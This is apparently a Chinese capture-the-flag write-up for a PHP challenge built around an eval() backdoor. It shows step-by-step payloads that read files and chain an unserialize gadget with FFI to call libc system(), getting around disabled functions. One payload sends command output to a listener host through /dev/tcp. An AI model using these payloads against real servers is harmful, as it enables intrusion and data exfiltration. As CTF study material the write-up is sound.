<?php
if (isset($_GET['a'])) {
eval($_GET['a']);
} else {
show_source(__FILE__);
}
尝试利用eval
?a=echo system("ls");
system()函数被禁止了.
尝试查看phpinfo();
?a=phpinfo();
查看成功,在页面查找disable_functions来查看都有哪些函数被禁用了:
在这里插入图片描述
接下来使用其中没有过滤的函数进行渗透:
?a=echo var_dump(scandir("/var/www/html/"));
返回结果如下:
array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) "index.php" [3]=> string(11) "preload.php" }
查看preload.php的内容:
?a=echo%20file_get_contents("preload.php");
得到如下代码:
<?php
final class A implements Serializable {
protected $data = [
'ret' => null,
'func' => 'print_r',
'arg' => '1'
];
private function run () {
$this->data['ret'] = $this->data['func']($this->data['arg']);
}
public function __serialize(): array {
return $this->data;
}
public function __unserialize(array $data) {
array_merge($this->data, $data);
$this->run();
}
public function serialize (): string {
return serialize($this->data);
}
public function unserialize($payload) {
$this->data = unserialize($payload);
$this->run();
}
public function __get ($key) {
return $this->data[$key];
}
public function __set ($key, $value) {
throw new \Exception('No implemented');
}
public function __construct () {
throw new \Exception('No implemented');
}
}
利用下面的脚本生成一个序列化对象:
<?php
final class A implements Serializable {
protected $data = [
'ret' => null,
'func' => 'print_r',
'arg' => '666'
];
private function run () {
$this->data['ret'] = $this->data['func']($this->data['arg']);
}
public function __serialize(): array {
return $this->data;
}
public function __unserialize(array $data) {
array_merge($this->data, $data);
$this->run();
}
public function serialize (): string {
return serialize($this->data);
}
public function unserialize($payload) {
$this->data = unserialize($payload);
$this->run();
}
public function __get ($key) {
return $this->data[$key];
}
public function __set ($key, $value) {
}
public function __construct () {
}
}
$A = new A();
var_dump(serialize($A))
?>
string(76) "C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}"
传参:
?a=include(%27preload.php%27);var_dump(unserialize(%27C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}%27)->__get("ret"));
返回结果如下:
成功用函数print_r打印出666
然后emmm,实在是想不出来改怎么利用,system,exec这些函数都被禁用了,于是看了看队里之前的wp:
发现一个叫做FFI的拓展
<?php
// create FFI object, loading libc and exporting function printf()
$ffi = FFI::cdef(
"int printf(const char *format, ...);", // this is regular C declaration
"libc.so.6");
// call C printf()
$ffi->printf("Hello %s!\n", "world");
那就修改一下之前生成payload的脚本:
?a=include(%27preload.php%27);unserialize(%27C:1:%22A%22:89:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:26:%22int%20system(char%20*command);%22;}}%27)-%3E__get(%22ret%22)-%3Esystem(%27bash%20-c%20%22ls%20%3E%20/dev/tcp/监听主机ip/8080%22%27);
发现flag,接下来把命令改成cat /flag即可
